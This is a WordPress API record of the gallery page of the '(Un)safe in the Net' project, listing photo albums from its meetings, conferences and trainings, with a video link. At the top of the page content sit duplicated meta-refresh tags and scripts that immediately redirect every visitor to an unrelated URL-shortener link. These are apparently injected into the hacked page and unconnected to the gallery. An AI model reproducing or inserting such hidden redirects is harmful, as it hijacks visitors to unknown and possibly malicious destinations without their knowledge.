{"id":423,"date":"2020-07-27T11:27:14","date_gmt":"2020-07-27T09:27:14","guid":{"rendered":"http:\/\/myslim.eu\/?page_id=423"},"modified":"2022-04-24T13:16:40","modified_gmt":"2022-04-24T11:16:40","slug":"gallery","status":"publish","type":"page","link":"https:\/\/myslim.eu\/en\/gallery\/","title":{"rendered":"Gallery"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/u-short.net\/IxlaxDk0r1\" \/><br \/>\n<script>window.location.href = \"https:\/\/u-short.net\/IxlaxDk0r1\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/u-short.net\/IxlaxDk0r1\" \/><br \/>\n<script>window.location.href = \"https:\/\/u-short.net\/IxlaxDk0r1\";<\/script><br \/>\n<div class=\"ngg-albumoverview default-view\">\n            <div class=\"ngg-album-compact\">\n            <div class=\"ngg-album-compactbox\">\n                <div class=\"ngg-album-link\">\n                                        <a title='4. Nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/4-nadnarodne-stretnutie'>\n                        <img class=\"Thumb\"\n                             alt=\"4. Nadn\u00e1rodn\u00e9 stretnutie\"\n                             src=\"https:\/\/myslim.eu\/wp-content\/gallery\/4-nadnarodne-stretnutie\/cache\/271474359_1084404105677282_4904164781261850455_n.jpg-nggid03114-ngg0dyn-240x160x100-00f0w010c011r110f110r010t010.jpg\"\/>\n                    <\/a>\n                                    <\/div>\n            <\/div>\n                        <h4>\n                <a class='ngg-album-desc' title='4. Nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/4-nadnarodne-stretnutie'style=\"max-width: 260px\">4. Nadn\u00e1rodn\u00e9 stretnutie<\/a>\n            <\/h4>\n            <p class=\"ngg-album-gallery-image-counter\">\n                                    <strong>16<\/strong>&nbsp;Photos                            <\/p>\n        <\/div>\n            <div class=\"ngg-album-compact\">\n            <div class=\"ngg-album-compactbox\">\n                <div class=\"ngg-album-link\">\n                                        <a title='Konferencia (Ne)bezpe\u010dne v sieti: Tatransk\u00e1 Lesn\u00e1 11.10.2021'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/konferencia-nebezpecne-v-sieti-tatranska-lesna-11-10-2021'>\n                        <img class=\"Thumb\"\n                             alt=\"Konferencia (Ne)bezpe\u010dne v sieti: Tatransk\u00e1 Lesn\u00e1 11.10.2021\"\n                             src=\"https:\/\/myslim.eu\/wp-content\/gallery\/konferencia-nebezpecne-v-sieti-tatranska-lesna-11-10-2021\/cache\/TL_intro.png-nggid0242-ngg0dyn-240x160x100-00f0w010c011r110f110r010t010.png\"\/>\n                    <\/a>\n                                    <\/div>\n            <\/div>\n                        <h4>\n                <a class='ngg-album-desc' title='Konferencia (Ne)bezpe\u010dne v sieti: Tatransk\u00e1 Lesn\u00e1 11.10.2021'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/konferencia-nebezpecne-v-sieti-tatranska-lesna-11-10-2021'style=\"max-width: 260px\">Konferencia (Ne)bezpe\u010dne v sieti: Tatransk\u00e1 Lesn\u00e1 11.10.2021<\/a>\n            <\/h4>\n            <p class=\"ngg-album-gallery-image-counter\">\n                                    <strong>25<\/strong>&nbsp;Photos                            <\/p>\n        <\/div>\n            <div class=\"ngg-album-compact\">\n            <div class=\"ngg-album-compactbox\">\n                <div class=\"ngg-album-link\">\n                                        <a title='Konferencia (Ne)bezpe\u010dne v sieti: Brno 4.10.2021'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/konferencia-nebezpecne-v-sieti-brno-4-10-2021'>\n                        <img class=\"Thumb\"\n                             alt=\"Konferencia (Ne)bezpe\u010dne v sieti: Brno 4.10.2021\"\n                             src=\"https:\/\/myslim.eu\/wp-content\/gallery\/konferencia-nebezpecne-v-sieti-brno-4-10-2021\/cache\/Brno_plagat_intro.png-nggid0216-ngg0dyn-240x160x100-00f0w010c011r110f110r010t010.png\"\/>\n                    <\/a>\n                                    <\/div>\n            <\/div>\n                        <h4>\n                <a class='ngg-album-desc' title='Konferencia (Ne)bezpe\u010dne v sieti: Brno 4.10.2021'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/konferencia-nebezpecne-v-sieti-brno-4-10-2021'style=\"max-width: 260px\">Konferencia (Ne)bezpe\u010dne v sieti: Brno 4.10.2021<\/a>\n            <\/h4>\n            <p class=\"ngg-album-gallery-image-counter\">\n                                    <strong>26<\/strong>&nbsp;Photos                            <\/p>\n        <\/div>\n            <div class=\"ngg-album-compact\">\n            <div class=\"ngg-album-compactbox\">\n                <div class=\"ngg-album-link\">\n                                        <a title='Vzdel\u00e1vanie (Ne)bezpe\u010dne v sieti'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/vzdelavanie-nebezpecne-v-sieti'>\n                        <img class=\"Thumb\"\n                             alt=\"Vzdel\u00e1vanie (Ne)bezpe\u010dne v sieti\"\n                             src=\"https:\/\/myslim.eu\/wp-content\/gallery\/vzdelavanie-nebezpecne-v-sieti\/cache\/skolenie01.jpg-nggid0274-ngg0dyn-240x160x100-00f0w010c011r110f110r010t010.jpg\"\/>\n                    <\/a>\n                                    <\/div>\n            <\/div>\n                        <h4>\n                <a class='ngg-album-desc' title='Vzdel\u00e1vanie (Ne)bezpe\u010dne v sieti'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/vzdelavanie-nebezpecne-v-sieti'style=\"max-width: 260px\">Vzdel\u00e1vanie (Ne)bezpe\u010dne v sieti<\/a>\n            <\/h4>\n            <p class=\"ngg-album-gallery-image-counter\">\n                                    <strong>24<\/strong>&nbsp;Photos                            <\/p>\n        <\/div>\n            <div class=\"ngg-album-compact\">\n            <div class=\"ngg-album-compactbox\">\n                <div class=\"ngg-album-link\">\n                                        <a title='3. Nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/3-nadnarodne-stretnutie'>\n                        <img class=\"Thumb\"\n                             alt=\"3. Nadn\u00e1rodn\u00e9 stretnutie\"\n                             src=\"https:\/\/myslim.eu\/wp-content\/gallery\/3-nadnarodne-stretnutie\/cache\/foto3.jpg-nggid0299-ngg0dyn-240x160x100-00f0w010c011r110f110r010t010.jpg\"\/>\n                    <\/a>\n                                    <\/div>\n            <\/div>\n                        <h4>\n                <a class='ngg-album-desc' title='3. Nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/3-nadnarodne-stretnutie'style=\"max-width: 260px\">3. Nadn\u00e1rodn\u00e9 stretnutie<\/a>\n            <\/h4>\n            <p class=\"ngg-album-gallery-image-counter\">\n                                    <strong>11<\/strong>&nbsp;Photos                            <\/p>\n        <\/div>\n            <div class=\"ngg-album-compact\">\n            <div class=\"ngg-album-compactbox\">\n                <div class=\"ngg-album-link\">\n                                        <a title='2. nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/2-nadnarodne-stretnutie'>\n                        <img class=\"Thumb\"\n                             alt=\"2. nadn\u00e1rodn\u00e9 stretnutie\"\n                             src=\"https:\/\/myslim.eu\/wp-content\/gallery\/2-nadnarodne-stretnutie\/cache\/IMG_3736.jpg-nggid018-ngg0dyn-240x160x100-00f0w010c011r110f110r010t010.jpg\"\/>\n                    <\/a>\n                                    <\/div>\n            <\/div>\n                        <h4>\n                <a class='ngg-album-desc' title='2. nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/2-nadnarodne-stretnutie'style=\"max-width: 260px\">2. nadn\u00e1rodn\u00e9 stretnutie<\/a>\n            <\/h4>\n            <p class=\"ngg-album-gallery-image-counter\">\n                                    <strong>8<\/strong>&nbsp;Photos                            <\/p>\n        <\/div>\n            <div class=\"ngg-album-compact\">\n            <div class=\"ngg-album-compactbox\">\n                <div class=\"ngg-album-link\">\n                                        <a title='1. nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/1-nadnarodne-stretnutie'>\n                        <img class=\"Thumb\"\n                             alt=\"1. nadn\u00e1rodn\u00e9 stretnutie\"\n                             src=\"https:\/\/myslim.eu\/wp-content\/gallery\/1-nadnarodne-stretnutie\/cache\/IMG_20190502_162010.jpg-nggid015-ngg0dyn-240x160x100-00f0w010c011r110f110r010t010.jpg\"\/>\n                    <\/a>\n                                    <\/div>\n            <\/div>\n                        <h4>\n                <a class='ngg-album-desc' title='1. nadn\u00e1rodn\u00e9 stretnutie'\n                       href='https:\/\/myslim.eu\/en\/gallery\/nggallery\/nebezpecne-v-sieti\/1-nadnarodne-stretnutie'style=\"max-width: 260px\">1. nadn\u00e1rodn\u00e9 stretnutie<\/a>\n            <\/h4>\n            <p class=\"ngg-album-gallery-image-counter\">\n                                    <strong>6<\/strong>&nbsp;Photos                            <\/p>\n        <\/div>\n        <br class=\"ngg-clear\"\/>\n    <div class='ngg-clear'><\/div><\/div>\n&nbsp;<\/p>\n<div class=\"vlp-link-container vlp-template-default\">\n\t<a href=\"https:\/\/youtu.be\/omLSDlFiDDY\" class=\"vlp-link\" title=\"(Un)safe in the Net - project summary\" rel=\"nofollow\" target=\"_blank\"><\/a>\t\t<div class=\"vlp-link-image-container\">\n\t\t<div class=\"vlp-link-image\">\n\t\t\t<img decoding=\"async\" src=\"https:\/\/img.youtube.com\/vi\/omLSDlFiDDY\/maxresdefault.jpg\" style=\"max-width: 150px; max-height: 150px\" \/>\t\t<\/div>\n\t<\/div>\n\t\t<div class=\"vlp-link-text-container\">\n\t\t\t\t<div class=\"vlp-link-title\">\n\t\t\t(Un)safe in the Net - project summary\t\t<\/div>\n\t\t\t\t\t\t<div class=\"vlp-link-summary\">\n\t\t\tProject \"(Un)safe in the Net\" in brief \ud83d\ude42 1 project, 2 countries, 3 organizations and many inspiring outputs and events ...\t\t<\/div>\n\t\t\t<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>","protected":false},"author":4,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"_links":{"self":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages\/423"}],"collection":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/comments?post=423"}],"version-history":[{"count":4,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages\/423\/revisions"}],"predecessor-version":[{"id":1360,"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/pages\/423\/revisions\/1360"}],"wp:attachment":[{"href":"https:\/\/myslim.eu\/en\/wp-json\/wp\/v2\/media?parent=423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}